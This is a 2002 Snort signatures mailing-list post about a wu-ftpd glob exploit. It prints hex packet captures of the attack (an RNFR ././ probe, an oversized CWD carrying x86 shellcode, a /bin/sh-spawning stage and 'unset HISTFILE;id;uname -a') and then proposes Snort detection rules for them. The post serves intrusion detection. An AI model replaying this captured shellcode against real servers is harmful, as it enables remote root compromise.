[Snort-sigs] A few wu-ftpd glob vulnerability rules.

Andreas Östling andreaso at ...58...
Wed Apr 10 04:47:09 EDT 2002


Hello,

I've been constantly hit with some wu-ftpd glob exploit the last couple of
weeks (can anyone name it btw?).

At least the "SHELLCODE x86 EB OC NOOP" and "FTP wu-ftp file completion
attempt {" rules will already catch it (and the "id check returned root"
rule should catch successful ones), but in case someone cares, here are a
few additional rules I find useful to catch this particular exploit.

A few interesting parts of the exploit I want to alert on:

03/26-10:25:51.760411 192.168.1.1:1797 -> 10.0.0.1:21
TCP TTL:50 TOS:0x0 ID:33278 IpLen:20 DgmLen:62 DF
***AP*** Seq: 0x8EA5CD78  Ack: 0x1CF6FCED  Win: 0x7D78  TcpLen: 32
TCP Options (3) => NOP NOP TS: 56099524 49581040
52 4E 46 52 20 2E 2F 2E 2F 0A                    RNFR ././.


03/26-10:26:03.239120 192.168.1.1:1797 -> 10.0.0.1:21
TCP TTL:50 TOS:0x0 ID:33364 IpLen:20 DgmLen:560 DF
***AP*** Seq: 0x8EA5D056  Ack: 0x1CF709E1  Win: 0x7D78  TcpLen: 32
TCP Options (3) => NOP NOP TS: 56100671 49582172
43 57 44 20 30 30 30 30 30 30 30 30 30 30 30 30  CWD 000000000000
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30  0000000000000000
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30  0000000000000000
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30  0000000000000000
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30  0000000000000000
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30  0000000000000000
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30  0000000000000000
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30  0000000000000000
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30  0000000000000000
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30  0000000000000000
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30  0000000000000000
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30  0000000000000000
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30  0000000000000000
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30  0000000000000000
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30  0000000000000000
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30  0000000000000000
30 30 30 30 F0 FC B8 FE 06 08 F8 2C 08 08 EB 0C  0000.......,....
EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C  ................
EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C  ................
EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C  ................
EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C  ................
EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C  ................
EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C  ................
EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C  ................
EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C  ................
EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C  ................
EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C  ................
EB 0C EB 0C 90 90 90 90 90 90 90 90 90 90 90 90  ................
31 DB 43 B8 0B 74 51 0B 2D 01 01 01 01 50 89 E1  1.C..tQ.-....P..
6A 04 58 89 C2 CD 80 EB 0E 31 DB F7 E3 FE CA 59  j.X......1.....Y
6A 03 58 CD 80 EB 05 E8 ED 0A CA 59 6A 03 58 CD  j.X........Yj.X.
80 EB 05 E8 ED FF FF FF FF FF FF 0A              ............


03/26-10:26:05.206213 192.168.1.1:1797 -> 10.0.0.1:21
TCP TTL:50 TOS:0x0 ID:33379 IpLen:20 DgmLen:124 DF
***AP*** Seq: 0x8EA5D2C1  Ack: 0x1CF70D25  Win: 0x7D78  TcpLen: 32
TCP Options (3) => NOP NOP TS: 56100868 49582383
33 DB F7 E3 B0 46 33 C9 CD 80 6A 54 8B DC B0 27  3....F3...jT...'
B1 ED CD 80 B0 3D CD 80 52 B1 10 68 2F 44 E2 F8  .....=..R..h/D..
8B DC B0 3D CD 80 58 6A 54 6A 28 58 CD 80 6A 0B  ...=..XjTj(X..j.
58 99 52 68 6E 2F 73 68 68 2F 2F 62 69 89 E3 52  X.Rhn/shh//bi..R
53 89 E1 CD 80 E1 CD 80                          S.......


03/26-10:26:05.328747 192.168.1.1:1797 -> 10.0.0.1:21
TCP TTL:50 TOS:0x0 ID:33382 IpLen:20 DgmLen:80 DF
***AP*** Seq: 0x8EA5D309  Ack: 0x1CF70D26  Win: 0x7D78  TcpLen: 32
TCP Options (3) => NOP NOP TS: 56100880 49582396
75 6E 73 65 74 20 48 49 53 54 46 49 4C 45 3B 69  unset HISTFILE;i
64 3B 75 6E 61 6D 65 20 2D 61 3B 0A              d;uname -a;.


The rules:

alert tcp $EXTERNAL_NET any -> $HOME_NET 21 (msg:"FTP RNFR ././"; \
content:"RNFR"; content:"././"; flags:A+;)

alert tcp $EXTERNAL_NET any -> $HOME_NET 21 (msg:"FTP EXPLOIT shell attempt"; \
content:"|6E 2F 73 68 68 2F 2F 62 69|"; flags:A+;)

alert tcp $EXTERNAL_NET any -> $HOME_NET 21 (msg:"FTP EXPLOIT uname -a"; \
content:"uname -a"; flags:A+;)

alert tcp $EXTERNAL_NET any -> $HOME_NET 21 (msg:"FTP large CWD packet"; \
content:"CWD "; dsize:>300; flags:A+;)

(plus flow:to_server; on all of them if you're into that)

I can extract a pcap if anyone is interested.

Regards,
Andreas Östling





More information about the Snort-sigs mailing list